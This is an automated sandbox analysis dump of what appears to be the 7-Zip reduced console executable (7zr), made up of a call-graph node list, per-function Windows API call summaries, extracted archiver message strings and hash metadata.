74689 cc80aa 74685->74689 74686 c999a8 74686->74636 74688->74635 74690 cc80b4 __EH_prolog 74689->74690 74691 c71e0c ctype 2 API calls 74690->74691 74692 cc80bf 74691->74692 74693 cc80d3 74692->74693 74695 cbbdb5 74692->74695 74693->74686 74696 cbbdbf __EH_prolog 74695->74696 74701 cbbe69 74696->74701 74698 cbbdef 74699 c72e04 2 API calls 74698->74699 74700 cbbe16 74699->74700 74700->74693 74702 cbbe73 __EH_prolog 74701->74702 74705 cb5e2b 74702->74705 74704 cbbe7f 74704->74698 74706 cb5e35 __EH_prolog 74705->74706 74711 cb08b6 74706->74711 74708 cb5e41 74716 c8dfc9 malloc _CxxThrowException __EH_prolog 74708->74716 74710 cb5e57 74710->74704 74717 c79c60 74711->74717 74713 cb08c4 74722 c79c8f GetModuleHandleA GetProcAddress 74713->74722 74715 cb08f3 __aulldiv 74715->74708 74716->74710 74727 c79c4d GetCurrentProcess GetProcessAffinityMask 74717->74727 74719 c79c6e 74720 c79c80 GetSystemInfo 74719->74720 74721 c79c79 74719->74721 74720->74713 74721->74713 74723 c79cc4 GlobalMemoryStatusEx 74722->74723 74724 c79cef GlobalMemoryStatus 74722->74724 74723->74724 74726 c79cce 74723->74726 74725 c79d08 74724->74725 74725->74726 74726->74715 74727->74719 74729 cb550f __EH_prolog 74728->74729 74748 cb4e8a 74729->74748 74733 cbf455 74732->74733 74971 c81092 74733->74971 74737 cbf478 74737->74639 74739 cbcf9b __EH_prolog 74738->74739 74740 cbf445 14 API calls 74739->74740 74741 cbd018 74740->74741 74745 cbd01f 74741->74745 75023 cc1511 74741->75023 74743 cbd08b 74743->74745 75029 cc2c5d 11 API calls 2 library calls 74743->75029 74745->74639 74746->74641 74747->74643 74749 cb4e94 __EH_prolog 74748->74749 74750 c72e04 2 API calls 74749->74750 74766 cb4f1d 74749->74766 74751 cb4ed7 74750->74751 74880 c87fc5 74751->74880 74753 cb4f0a 74757 c7965d VariantClear 74753->74757 74754 cb4f37 74755 cb4f63 74754->74755 74756 cb4f41 74754->74756 74759 c72f88 3 API calls 74755->74759 74758 c7965d VariantClear 74756->74758 74760 cb4f15 74757->74760 74761 cb4f4c 74758->74761 74762 cb4f71 
74759->74762 74901 c71e40 free 74760->74901 74902 c71e40 free 74761->74902 74765 c7965d VariantClear 74762->74765 74767 cb4f80 74765->74767 74766->74639 74903 c85bcf malloc _CxxThrowException 74767->74903 74769 cb4f9a 74770 c72e47 2 API calls 74769->74770 74771 cb4fad 74770->74771 74772 c72f1c 2 API calls 74771->74772 74773 cb4fbd 74772->74773 74774 c72e04 2 API calls 74773->74774 74775 cb4fd1 74774->74775 74776 c72e04 2 API calls 74775->74776 74782 cb4fdd 74776->74782 74777 cb5404 74948 c71e40 free 74777->74948 74779 cb540c 74949 c71e40 free 74779->74949 74781 cb5414 74950 c71e40 free 74781->74950 74782->74777 74904 c85bcf malloc _CxxThrowException 74782->74904 74785 cb5099 74787 c72da9 2 API calls 74785->74787 74786 cb541c 74951 c71e40 free 74786->74951 74789 cb50a9 74787->74789 74791 c72fec 3 API calls 74789->74791 74790 cb5424 74952 c71e40 free 74790->74952 74793 cb50b6 74791->74793 74905 c71e40 free 74793->74905 74794 cb542c 74953 c71e40 free 74794->74953 74797 cb50be 74906 c71e40 free 74797->74906 74799 cb50cd 74800 c72f88 3 API calls 74799->74800 74801 cb50e3 74800->74801 74802 cb50f1 74801->74802 74803 cb5100 74801->74803 74907 c730ea 74802->74907 74913 c73044 malloc _CxxThrowException free ctype 74803->74913 74806 cb50fe 74914 c81029 6 API calls 74806->74914 74808 cb511a 74809 cb516b 74808->74809 74810 cb5120 74808->74810 74921 c8089e malloc _CxxThrowException free _CxxThrowException memcpy 74809->74921 74915 c71e40 free 74810->74915 74813 cb5187 74817 cb04d2 5 API calls 74813->74817 74814 cb5128 74916 c71e40 free 74814->74916 74816 cb5130 74917 c71e40 free 74816->74917 74819 cb51ba 74817->74819 74922 cb0516 malloc _CxxThrowException ctype 74819->74922 74820 cb5138 74918 c71e40 free 74820->74918 74823 cb51c5 74827 cb522d 74823->74827 74828 cb51f5 74823->74828 74824 cb5140 74919 c71e40 free 74824->74919 74826 cb5148 74920 c71e40 free 74826->74920 74830 c72e04 2 API calls 74827->74830 74923 c71e40 free 74828->74923 74877 cb5235 74830->74877 74832 cb51fd 
74924 c71e40 free 74832->74924 74835 cb5205 74925 c71e40 free 74835->74925 74836 cb532e 74934 c71e40 free 74836->74934 74839 cb520d 74926 c71e40 free 74839->74926 74840 cb5347 74840->74777 74842 cb5358 74840->74842 74935 c71e40 free 74842->74935 74843 cb5215 74927 c71e40 free 74843->74927 74845 cb53a3 74941 c71e40 free 74845->74941 74847 cb5360 74936 c71e40 free 74847->74936 74848 cb521d 74928 c71e40 free 74848->74928 74852 cb5368 74937 c71e40 free 74852->74937 74855 cb53bc 74942 c71e40 free 74855->74942 74860 cb53c4 74943 c71e40 free 74860->74943 74861 cb04d2 5 API calls 74861->74877 74865 cb53cc 74944 c71e40 free 74865->74944 74870 cb53d4 74877->74836 74877->74845 74877->74861 74878 c72e04 2 API calls 74877->74878 74929 cb545c 5 API calls 2 library calls 74877->74929 74930 c81029 6 API calls 74877->74930 74931 c8089e malloc _CxxThrowException free _CxxThrowException memcpy 74877->74931 74932 cb0516 malloc _CxxThrowException ctype 74877->74932 74933 c71e40 free 74877->74933 74878->74877 74881 c87fcf __EH_prolog 74880->74881 74883 c88061 74881->74883 74885 c8805c 74881->74885 74886 c88019 74881->74886 74890 c87ff4 74881->74890 74882 c8800a 74963 c79736 VariantClear 74882->74963 74883->74885 74898 c88025 74883->74898 74962 c79630 VariantClear 74885->74962 74889 c8801e 74886->74889 74886->74890 74887 c880b8 74891 c7965d VariantClear 74887->74891 74892 c88042 74889->74892 74893 c88022 74889->74893 74890->74882 74954 c7950d 74890->74954 74895 c880c0 74891->74895 74960 c79597 VariantClear 74892->74960 74896 c88032 74893->74896 74893->74898 74895->74753 74895->74754 74959 c79604 VariantClear 74896->74959 74898->74882 74961 c795df VariantClear 74898->74961 74901->74766 74902->74766 74903->74769 74904->74785 74905->74797 74906->74799 74908 c730fd 74907->74908 74909 c7311d 74908->74909 74910 c71e0c ctype 2 API calls 74908->74910 74909->74806 74911 c73113 74910->74911 74970 c71e40 free 74911->74970 74913->74806 74914->74808 74915->74814 74916->74816 74917->74820 74918->74824 
74919->74826 74920->74766 74921->74813 74922->74823 74923->74832 74924->74835 74925->74839 74926->74843 74927->74848 74928->74766 74929->74877 74930->74877 74931->74877 74932->74877 74933->74877 74934->74840 74935->74847 74936->74852 74941->74855 74942->74860 74943->74865 74944->74870 74948->74779 74949->74781 74950->74786 74951->74790 74952->74794 74953->74766 74964 c79767 74954->74964 74956 c79518 SysAllocStringLen 74957 c7954f 74956->74957 74958 c79539 _CxxThrowException 74956->74958 74957->74882 74958->74957 74959->74882 74960->74882 74961->74882 74962->74882 74963->74887 74965 c79770 74964->74965 74966 c79779 74964->74966 74965->74956 74969 c79686 VariantClear 74966->74969 74968 c79780 74968->74956 74969->74968 74970->74909 74973 c7b95a 6 API calls 74971->74973 74972 c810aa 74972->74737 74974 cbf1b2 74972->74974 74973->74972 74975 cbf1bc __EH_prolog 74974->74975 74984 c81168 74975->74984 74977 cbf1d3 74978 cbf21c _CxxThrowException 74977->74978 74979 cbf231 memcpy 74977->74979 74980 cbf1e6 74977->74980 74978->74979 74982 cbf24c 74979->74982 74980->74737 74981 cbf2f0 memmove 74981->74982 74982->74980 74982->74981 74983 cbf31a memcpy 74982->74983 74983->74980 74987 c8111c 74984->74987 74988 c81130 74987->74988 74989 c8115f 74988->74989 74992 c7b668 74988->74992 75011 c7d331 74988->75011 74989->74977 74999 c7b675 74992->74999 74993 c7b864 75015 c77b7c 74993->75015 74996 c7b8aa GetLastError 74997 c7b6aa 74996->74997 74997->74988 74998 c7b81b 74998->74997 75002 c7b839 memcpy 74998->75002 74999->74993 74999->74997 74999->74998 75000 c77731 5 API calls 74999->75000 75001 c7b7e7 74999->75001 75003 c7b811 74999->75003 75005 c7b7ad 74999->75005 75020 c77b4f ReadFile 74999->75020 75000->74999 75001->74993 75004 c77731 5 API calls 75001->75004 75002->74997 75021 c7b8ec GetLastError 75003->75021 75006 c7b80d 75004->75006 75005->74999 75010 c7b8c7 75005->75010 75019 cf6a20 VirtualAlloc 75005->75019 75006->74993 75006->75003 75010->74997 75013 c7d355 75011->75013 75012 
c7d374 75012->74988 75013->75012 75014 c7b668 10 API calls 75013->75014 75014->75012 75016 c77b89 75015->75016 75022 c77b4f ReadFile 75016->75022 75018 c77b9a 75018->74996 75018->74997 75019->75005 75020->74999 75021->74997 75022->75018 75024 cc151b __EH_prolog 75023->75024 75030 cc10d3 75024->75030 75027 cc1589 75027->74743 75028 cc1552 _CxxThrowException 75028->74743 75028->75027 75029->74745 75031 cc10dd __EH_prolog 75030->75031 75062 cbd1b7 75031->75062 75033 cc12ef 75033->75027 75033->75028 75034 cc11f4 75034->75033 75061 c7b95a 6 API calls 75034->75061 75035 cc139e 75035->75033 75036 cc13c4 75035->75036 75038 c71e0c ctype 2 API calls 75035->75038 75039 c81168 10 API calls 75036->75039 75038->75036 75043 cc13da 75039->75043 75040 c81168 10 API calls 75040->75034 75041 cc13de 75110 c71e40 free 75041->75110 75043->75041 75045 cc13f9 75043->75045 75104 cbef67 _CxxThrowException 75043->75104 75069 cbf047 75045->75069 75048 cc14ba 75108 cc0943 50 API calls 2 library calls 75048->75108 75050 cc1450 75073 cc06ae 75050->75073 75052 cc14e7 75109 ca2db9 free ctype 75052->75109 75061->75035 75111 cbd23c 75062->75111 75064 cbd1ed 75118 c71e40 free 75064->75118 75066 cbd209 75119 c71e40 free 75066->75119 75068 cbd21c 75068->75033 75068->75034 75068->75040 75070 cbf063 75069->75070 75071 cbf072 75070->75071 75147 cbef67 _CxxThrowException 75070->75147 75071->75048 75071->75050 75105 cbef67 _CxxThrowException 75071->75105 75074 cc06b8 __EH_prolog 75073->75074 75148 cc03f4 75074->75148 75079 cc08e3 _CxxThrowException 75081 cc08f7 75079->75081 75086 cbb8dc ctype free 75081->75086 75084 c7429a 3 API calls 75087 cc0715 75084->75087 75089 cc0914 75086->75089 75087->75079 75087->75081 75087->75084 75090 c71e0c ctype 2 API calls 75087->75090 75102 cc0877 75087->75102 75103 cbef67 _CxxThrowException 75087->75103 75178 c812a5 75087->75178 75183 cb81ec 75087->75183 75279 c71e40 free 75089->75279 75090->75087 75094 cc091c 75280 c71e40 free 75094->75280 75096 cc0924 75269 cbb8dc 
75102->75269 75103->75087 75104->75045 75105->75050 75108->75052 75109->75041 75110->75033 75120 cbd2b8 75111->75120 75114 cbd25e 75137 c71e40 free 75114->75137 75117 cbd275 75117->75064 75118->75066 75119->75068 75139 c71e40 free 75120->75139 75122 cbd2c8 75140 c71e40 free 75122->75140 75124 cbd2dc 75141 c71e40 free 75124->75141 75126 cbd2e7 75142 c71e40 free 75126->75142 75128 cbd2f2 75143 c71e40 free 75128->75143 75130 cbd2fd 75144 c71e40 free 75130->75144 75132 cbd308 75145 c71e40 free 75132->75145 75134 cbd313 75135 cbd246 75134->75135 75146 c71e40 free 75134->75146 75135->75114 75138 c71e40 free 75135->75138 75137->75117 75138->75114 75139->75122 75140->75124 75141->75126 75142->75128 75143->75130 75144->75132 75145->75134 75146->75135 75147->75071 75149 cbf047 _CxxThrowException 75148->75149 75150 cc0407 75149->75150 75152 cbf047 _CxxThrowException 75150->75152 75153 cc0475 75150->75153 75151 cc04b8 75155 cc04e8 75151->75155 75158 cc04cd 75151->75158 75163 cc0421 75152->75163 75154 cc049a 75153->75154 75286 cbfa3f 22 API calls 2 library calls 75153->75286 75154->75151 75287 cc159a malloc _CxxThrowException free ctype 75154->75287 75289 cc7c4a malloc _CxxThrowException free ctype 75155->75289 75288 cbfff0 9 API calls 2 library calls 75158->75288 75159 cc043e 75284 cbf93c 7 API calls 2 library calls 75159->75284 75161 cc0492 75164 cbf047 _CxxThrowException 75161->75164 75163->75159 75283 cbef67 _CxxThrowException 75163->75283 75164->75154 75166 cc0446 75170 cc046d 75166->75170 75285 cbef67 _CxxThrowException 75166->75285 75167 cc04db 75171 cbf047 _CxxThrowException 75167->75171 75169 cc04e3 75174 cc054a 75169->75174 75291 cbef67 _CxxThrowException 75169->75291 75173 cbf047 _CxxThrowException 75170->75173 75171->75169 75172 cc04f3 75172->75169 75290 c8089e malloc _CxxThrowException free _CxxThrowException memcpy 75172->75290 75173->75153 75174->75087 75179 cb04d2 5 API calls 75178->75179 75180 c812ad 75179->75180 75181 c71e0c ctype 2 API calls 75180->75181 
75182 c812b4 75181->75182 75182->75087 75184 cb81f6 __EH_prolog 75183->75184 75292 cbf749 75184->75292 75186 cb824e 75187 cb823b 75187->75186 75296 cb8f58 75187->75296 75270 cbb8e6 __EH_prolog 75269->75270 75366 c71e40 free 75270->75366 75272 cbb90d 75367 cae647 free ctype 75272->75367 75274 cbb915 75279->75094 75280->75096 75283->75159 75284->75166 75285->75170 75286->75161 75287->75151 75288->75167 75289->75172 75290->75172 75291->75174 75293 cbf779 75292->75293 75294 cbf782 _CxxThrowException 75293->75294 75295 cbf797 75293->75295 75294->75295 75295->75187 75366->75272 75367->75274 75368 c742d1 75369 c742bd 75368->75369 75370 c71e0c ctype 2 API calls 75369->75370 75371 c742c5 75369->75371 75370->75371 75372 c81ade 75373 c81ae8 __EH_prolog 75372->75373 75423 c713f5 75373->75423 75376 c81b32 6 API calls 75378 c81b8d 75376->75378 75387 c81bf8 75378->75387 75441 c81ea4 9 API calls 75378->75441 75379 c81b24 _CxxThrowException 75379->75376 75381 c81bdf 75442 c727bb 75381->75442 75385 c81c89 75437 c81eb9 75385->75437 75387->75385 75449 c91d73 5 API calls __EH_prolog 75387->75449 75390 c81cb2 _CxxThrowException 75390->75385 75424 c713ff __EH_prolog 75423->75424 75425 c97ebb free 75424->75425 75426 c7142b 75425->75426 75427 c71438 75426->75427 75450 c71212 free ctype 75426->75450 75429 c71e0c ctype 2 API calls 75427->75429 75430 c7144d 75429->75430 75431 cb04d2 5 API calls 75430->75431 75434 c71507 75430->75434 75436 c714f4 75430->75436 75451 c71265 5 API calls 2 library calls 75430->75451 75452 c71524 malloc _CxxThrowException __EH_prolog ctype 75430->75452 75431->75430 75435 c72fec 3 API calls 75434->75435 75435->75436 75436->75376 75440 c91d73 5 API calls __EH_prolog 75436->75440 75453 c79313 GetCurrentProcess OpenProcessToken 75437->75453 75440->75379 75441->75381 75443 c727c7 75442->75443 75447 c727e3 75442->75447 75444 c71e0c ctype 2 API calls 75443->75444 75443->75447 75445 c727da 75444->75445 75460 c71e40 free 75445->75460 75448 c71e40 free 75447->75448 
75448->75387 75449->75390 75450->75427 75451->75430 75452->75430 75454 c79390 75453->75454 75455 c7933a LookupPrivilegeValueW 75453->75455 75456 c79382 75455->75456 75457 c7934c AdjustTokenPrivileges 75455->75457 75459 c79385 CloseHandle 75456->75459 75457->75456 75458 c79372 GetLastError 75457->75458 75458->75459 75459->75454 75460->75447 75461 caacd3 75462 caace0 75461->75462 75463 caacf1 75461->75463 75462->75463 75467 caacf8 75462->75467 75468 cac0b3 __EH_prolog 75467->75468 75469 cac0ed 75468->75469 75475 c97193 75468->75475 75483 c71e40 free 75468->75483 75484 c71e40 free 75469->75484 75471 caaceb 75474 c71e40 free 75471->75474 75474->75463 75476 c9719d __EH_prolog 75475->75476 75485 ca2db9 free ctype 75476->75485 75478 c971b3 75486 c971d5 free __EH_prolog ctype 75478->75486 75480 c971bf 75487 c71e40 free 75480->75487 75482 c971c7 75482->75468 75483->75468 75484->75471 75485->75478 75486->75480 75487->75482 75488 c7b5d9 75489 c7b5e6 75488->75489 75493 c7b5f7 75488->75493 75489->75493 75494 c7b5fe 75489->75494 75495 c7b608 __EH_prolog 75494->75495 75501 cf6a40 VirtualFree 75495->75501 75497 c7b63d 75498 c7764c CloseHandle 75497->75498 75499 c7b5f1 75498->75499 75500 c71e40 free 75499->75500 75500->75493 75501->75497 75502 cf69d0 75503 cf69d7 malloc 75502->75503 75504 cf69d4 75502->75504 75506 c81368 75508 c8136d 75506->75508 75509 c8138c 75508->75509 75512 d07d80 WaitForSingleObject 75508->75512 75515 caf745 75508->75515 75519 d07ea0 SetEvent GetLastError 75508->75519 75513 d07d98 75512->75513 75514 d07d8e GetLastError 75512->75514 75513->75508 75514->75513 75516 caf74f __EH_prolog 75515->75516 75520 caf784 75516->75520 75518 caf765 75518->75508 75519->75508 75521 caf78e __EH_prolog 75520->75521 75522 c812d4 4 API calls 75521->75522 75523 caf7c7 75522->75523 75524 c812d4 4 API calls 75523->75524 75525 caf7d4 75524->75525 75526 caf871 75525->75526 75529 c7c4d6 75525->75529 75535 cf6b23 VirtualAlloc 75525->75535 75526->75518 75533 c7c4e9 75529->75533 75530 
c8111c 10 API calls 75530->75533 75531 c811b4 107 API calls 75531->75533 75532 c7c6f3 75532->75526 75533->75530 75533->75531 75533->75532 75533->75533 75534 c7c695 memmove 75533->75534 75534->75533 75535->75526 75536 d0ffb1 __setusermatherr 75537 d0ffbd 75536->75537 75542 d10068 _controlfp 75537->75542 75539 d0ffc2 _initterm __getmainargs _initterm __p___initenv 75540 cac27c 75539->75540 75541 d1001d exit _XcptFilter 75540->75541 75542->75539 75543 caa42c 75544 caa449 75543->75544 75545 caa435 fputs 75543->75545 75702 ca545d 75544->75702 75701 c71fa0 fputc 75545->75701 75549 c72e04 2 API calls 75550 caa4a1 75549->75550 75706 c91858 75550->75706 75552 caa4c9 75768 c71e40 free 75552->75768 75554 caa4d8 75555 caa4ee 75554->75555 75769 cac7d7 75554->75769 75557 caa50e 75555->75557 75777 ca57fb 75555->75777 75787 cac73e 75557->75787 75562 caac17 75965 ca2db9 free ctype 75562->75965 75563 c71e0c ctype 2 API calls 75565 caa53a 75563->75565 75566 caa54d 75565->75566 75923 cab0fa malloc _CxxThrowException __EH_prolog 75565->75923 75574 c72fec 3 API calls 75566->75574 75567 caac3a 75967 cab96d _CxxThrowException 75567->75967 75568 caac23 75568->75567 75571 caac35 75568->75571 75966 cab988 33 API calls __aulldiv 75571->75966 75573 caac42 75968 c71e40 free 75573->75968 75579 caa586 75574->75579 75576 caac4d 75969 c93247 75576->75969 75805 caad06 75579->75805 75583 caac7d 75976 c711c2 free __EH_prolog ctype 75583->75976 75588 caac89 75678 caaae5 75964 ca2db9 free ctype 75678->75964 75701->75544 75703 ca5473 75702->75703 75704 ca5466 75702->75704 75703->75549 75979 c7275e malloc _CxxThrowException free ctype 75704->75979 75707 c91862 __EH_prolog 75706->75707 75980 c9021a 75707->75980 75712 c918b9 75994 c91aa5 free __EH_prolog ctype 75712->75994 75713 c91935 75999 c91aa5 free __EH_prolog ctype 75713->75999 75716 c918c7 75995 ca2db9 free ctype 75716->75995 75717 c91944 75739 c91966 75717->75739 76000 c91d73 5 API calls __EH_prolog 75717->76000 75720 c918d3 75720->75552 75722 
                                          APIs
                                          • __EH_prolog.LIBCMT ref: 00CB81F1
                                            • Part of subcall function 00CBF749: _CxxThrowException.MSVCRT(?,00D24A58), ref: 00CBF792
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000009.00000002.1734820687.0000000000C71000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00C70000, based on PE: true
                                          • Associated: 00000009.00000002.1734801046.0000000000C70000.00000002.00000001.01000000.0000000A.sdmp
                                          • Associated: 00000009.00000002.1734905117.0000000000D1C000.00000002.00000001.01000000.0000000A.sdmp
                                          • Associated: 00000009.00000002.1734935671.0000000000D32000.00000004.00000001.01000000.0000000A.sdmp
                                          • Associated: 00000009.00000002.1734955137.0000000000D3B000.00000002.00000001.01000000.0000000A.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_9_2_c70000_7zr.jbxd
                                          Similarity
                                          • API ID: ExceptionH_prologThrow
                                          • String ID:
                                          • API String ID: 461045715-3916222277
                                          • Opcode ID: 308a50ab7fdd2f525528cd6cd8dd3ebe4096af7d7765a10b9c2374172108c2b7
                                          • Instruction ID: 18996656fb46b47765f212205e29f8f0a4e4e874f17040b1a596461e56468d97
                                          • Opcode Fuzzy Hash: 308a50ab7fdd2f525528cd6cd8dd3ebe4096af7d7765a10b9c2374172108c2b7
                                          • Instruction Fuzzy Hash: 2E92A130900259DFDF15DFA8C884BEEBBB5BF18304F244099E815AB292CB75DE49DB61
                                          APIs
                                          • __EH_prolog.LIBCMT ref: 00C7686D
                                            • Part of subcall function 00C76848: FindClose.KERNELBASE(00000000,?,00C76880), ref: 00C76853
                                          • FindFirstFileW.KERNELBASE(?,-00000268,?,00000000), ref: 00C768A5
                                          • FindFirstFileW.KERNELBASE(?,-00000268,00000000,?,00000000), ref: 00C768DE
                                          Memory Dump Source
                                          • Source File: 00000009.00000002.1734820687.0000000000C71000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00C70000, based on PE: true
                                          • Associated: 00000009.00000002.1734801046.0000000000C70000.00000002.00000001.01000000.0000000A.sdmp
                                          • Associated: 00000009.00000002.1734905117.0000000000D1C000.00000002.00000001.01000000.0000000A.sdmp
                                          • Associated: 00000009.00000002.1734935671.0000000000D32000.00000004.00000001.01000000.0000000A.sdmp
                                          • Associated: 00000009.00000002.1734955137.0000000000D3B000.00000002.00000001.01000000.0000000A.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_9_2_c70000_7zr.jbxd
                                          Similarity
                                          • API ID: Find$FileFirst$CloseH_prolog
                                          • String ID:
                                          • API String ID: 3371352514-0
                                          • Opcode ID: 0f2afbb2cfde72f0ebe66ca3baebe23b44a42722a3531416ed893db599fbe265
                                          • Instruction ID: d0231cf1e80842dc96f84b5eceab2a8f40c8e164a680709eec90bdd5c9a40b61
                                          • Opcode Fuzzy Hash: 0f2afbb2cfde72f0ebe66ca3baebe23b44a42722a3531416ed893db599fbe265
                                          • Instruction Fuzzy Hash: 2E11C431500609EBCF10EF64D8555EDB779EF50324F208629E9B9571D1DB318EC6EB50

                                          Control-flow Graph (rendered graph of the function starting at caa013; executed/not-executed colouring not reproduced here)
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000009.00000002.1734820687.0000000000C71000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00C70000, based on PE: true
                                          • Associated: 00000009.00000002.1734801046.0000000000C70000.00000002.00000001.01000000.0000000A.sdmp
                                          • Associated: 00000009.00000002.1734905117.0000000000D1C000.00000002.00000001.01000000.0000000A.sdmp
                                          • Associated: 00000009.00000002.1734935671.0000000000D32000.00000004.00000001.01000000.0000000A.sdmp
                                          • Associated: 00000009.00000002.1734955137.0000000000D3B000.00000002.00000001.01000000.0000000A.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_9_2_c70000_7zr.jbxd
                                          Similarity
                                          • API ID: fputs$ExceptionThrow
                                          • String ID: 7zCon.sfx$Alternate Streams Size: $Alternate Streams: $Archives with Errors: $Archives with Warnings: $Archives: $Can't open as archive: $Compressed: $ERROR:$Files: $Folders: $OK archives: $Open Errors: $Size: $Sub items Errors: $Warnings: $N
                                          • API String ID: 3665150552-429544124
                                          • Opcode ID: ea44d24f4fe6c195223dcd5f77e08465ef6d734cfa4d6c4c798c946d371ef4e8
                                          • Instruction ID: 897313e0ac8c4206c8c9fd74b4b098da8b8551161f0334c2ca6762a470baa862
                                          • Opcode Fuzzy Hash: ea44d24f4fe6c195223dcd5f77e08465ef6d734cfa4d6c4c798c946d371ef4e8
                                          • Instruction Fuzzy Hash: CD528C30D00259DFCF26DBA4C985BEDBBB5AF55308F14409AE459A3292DB346F88DF21

                                          Control-flow Graph: function at 00CAA42C (rendered graph with executed / not executed block shading omitted)
                                          APIs
                                          • fputs.MSVCRT(Scanning the drive for archives:), ref: 00CAA43E
                                            • Part of subcall function 00C71FA0: fputc.MSVCRT ref: 00C71FA7
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000009.00000002.1734820687.0000000000C71000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00C70000, based on PE: true
                                          • Associated: 00000009.00000002.1734801046.0000000000C70000.00000002.00000001.01000000.0000000A.sdmp
                                          • Associated: 00000009.00000002.1734905117.0000000000D1C000.00000002.00000001.01000000.0000000A.sdmp
                                          • Associated: 00000009.00000002.1734935671.0000000000D32000.00000004.00000001.01000000.0000000A.sdmp
                                          • Associated: 00000009.00000002.1734955137.0000000000D3B000.00000002.00000001.01000000.0000000A.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_9_2_c70000_7zr.jbxd
                                          Similarity
                                          • API ID: fputcfputs
                                          • String ID: Alternate Streams Size: $Alternate Streams: $Archives with Errors: $Archives with Warnings: $Archives: $Can't open as archive: $Compressed: $ERROR:$Files: $Folders: $OK archives: $Open Errors: $Scanning the drive for archives:$Size: $Warnings: $!"$N
                                          • API String ID: 269475090-3104439828
                                          • Opcode ID: 32f5157f7793821398b92cce8002f638b628499fe220a941772817cdad4e2eae
                                          • Instruction ID: fec77fd14cff59fe2a8bcb30bf5e791625bcd498b7bddebefba1ff231510c722
                                          • Opcode Fuzzy Hash: 32f5157f7793821398b92cce8002f638b628499fe220a941772817cdad4e2eae
                                          • Instruction Fuzzy Hash: A1228C30A002599FDF26DBA4C845BEDFBF1BF55308F14809AE459A3291DB356E84EF21

                                          Control-flow Graph: function at 00CA8012 (rendered graph with executed / not executed block shading omitted)
                                          APIs
                                          • __EH_prolog.LIBCMT ref: 00CA8017
                                          • fputs.MSVCRT ref: 00CA804D
                                            • Part of subcall function 00CA8341: __EH_prolog.LIBCMT ref: 00CA8346
                                            • Part of subcall function 00CA8341: fputs.MSVCRT ref: 00CA835B
                                            • Part of subcall function 00CA8341: fputs.MSVCRT ref: 00CA8364
                                          • fputs.MSVCRT ref: 00CA807A
                                            • Part of subcall function 00C71FA0: fputc.MSVCRT ref: 00C71FA7
                                            • Part of subcall function 00C7965D: VariantClear.OLEAUT32(?), ref: 00C7967F
                                          • SysFreeString.OLEAUT32(00000000), ref: 00CA81AA
                                          • fputs.MSVCRT ref: 00CA81CD
                                          • SysFreeString.OLEAUT32(00000000), ref: 00CA8267
                                          • SysFreeString.OLEAUT32(00000000), ref: 00CA82B1
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000009.00000002.1734820687.0000000000C71000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00C70000, based on PE: true
                                          • Associated: 00000009.00000002.1734801046.0000000000C70000.00000002.00000001.01000000.0000000A.sdmp
                                          • Associated: 00000009.00000002.1734905117.0000000000D1C000.00000002.00000001.01000000.0000000A.sdmp
                                          • Associated: 00000009.00000002.1734935671.0000000000D32000.00000004.00000001.01000000.0000000A.sdmp
                                          • Associated: 00000009.00000002.1734955137.0000000000D3B000.00000002.00000001.01000000.0000000A.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_9_2_c70000_7zr.jbxd
                                          Similarity
                                          • API ID: fputs$FreeString$H_prolog$ClearVariantfputc
                                          • String ID: --$----$Path$Type$Warning: The archive is open with offset
                                          • API String ID: 2889736305-3797937567
                                          • Opcode ID: 6310067c4f8a7bac24b2dcfc8105a068b971b2c2014fe34020527dc60b70c44c
                                          • Instruction ID: e0aabc159c344be7d5b576c68a86af51db6322ea9a235d3d850632ab575ee646
                                          • Opcode Fuzzy Hash: 6310067c4f8a7bac24b2dcfc8105a068b971b2c2014fe34020527dc60b70c44c
                                          • Instruction Fuzzy Hash: E1916871A00606EFDF14DFA4D985AEEB7B5FF49314F204129E512A7290DF70AE4ACB60

                                          Control-flow Graph: function at 00CA6766 (rendered graph with executed / not executed block shading omitted)
                                          APIs
                                          • __EH_prolog.LIBCMT ref: 00CA676B
                                          • EnterCriticalSection.KERNEL32(00D32938), ref: 00CA6781
                                          • fputs.MSVCRT ref: 00CA680B
                                          • LeaveCriticalSection.KERNEL32(00D32938), ref: 00CA6944
                                            • Part of subcall function 00CAC7D7: fputs.MSVCRT ref: 00CAC840
                                          • fputs.MSVCRT ref: 00CA6851
                                            • Part of subcall function 00C72201: fputs.MSVCRT ref: 00C7221E
                                          • fputs.MSVCRT ref: 00CA68D9
                                          • fputs.MSVCRT ref: 00CA68F6
                                            • Part of subcall function 00C71FA0: fputc.MSVCRT ref: 00C71FA7
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000009.00000002.1734820687.0000000000C71000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00C70000, based on PE: true
                                          • Associated: 00000009.00000002.1734801046.0000000000C70000.00000002.00000001.01000000.0000000A.sdmp
                                          • Associated: 00000009.00000002.1734905117.0000000000D1C000.00000002.00000001.01000000.0000000A.sdmp
                                          • Associated: 00000009.00000002.1734935671.0000000000D32000.00000004.00000001.01000000.0000000A.sdmp
                                          • Associated: 00000009.00000002.1734955137.0000000000D3B000.00000002.00000001.01000000.0000000A.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_9_2_c70000_7zr.jbxd
                                          Similarity
                                          • API ID: fputs$CriticalSection$EnterH_prologLeavefputc
                                          • String ID: v$Sub items Errors:
                                          • API String ID: 2670240366-2468115448
                                          • Opcode ID: 7d14b0767bf4039584235480d9702d69371f6a33461722d3b6ba1183dfe53742
                                          • Instruction ID: b84c5e213e4dce0693cdcec9c7daa3a8bfd09fa9c060a762de618485c67a4d85
                                          • Opcode Fuzzy Hash: 7d14b0767bf4039584235480d9702d69371f6a33461722d3b6ba1183dfe53742
                                          • Instruction Fuzzy Hash: BF51CE31540701DFCB259FB4D894AEAB7E2FF85314F58842EE5AA87261CB306D45DF60

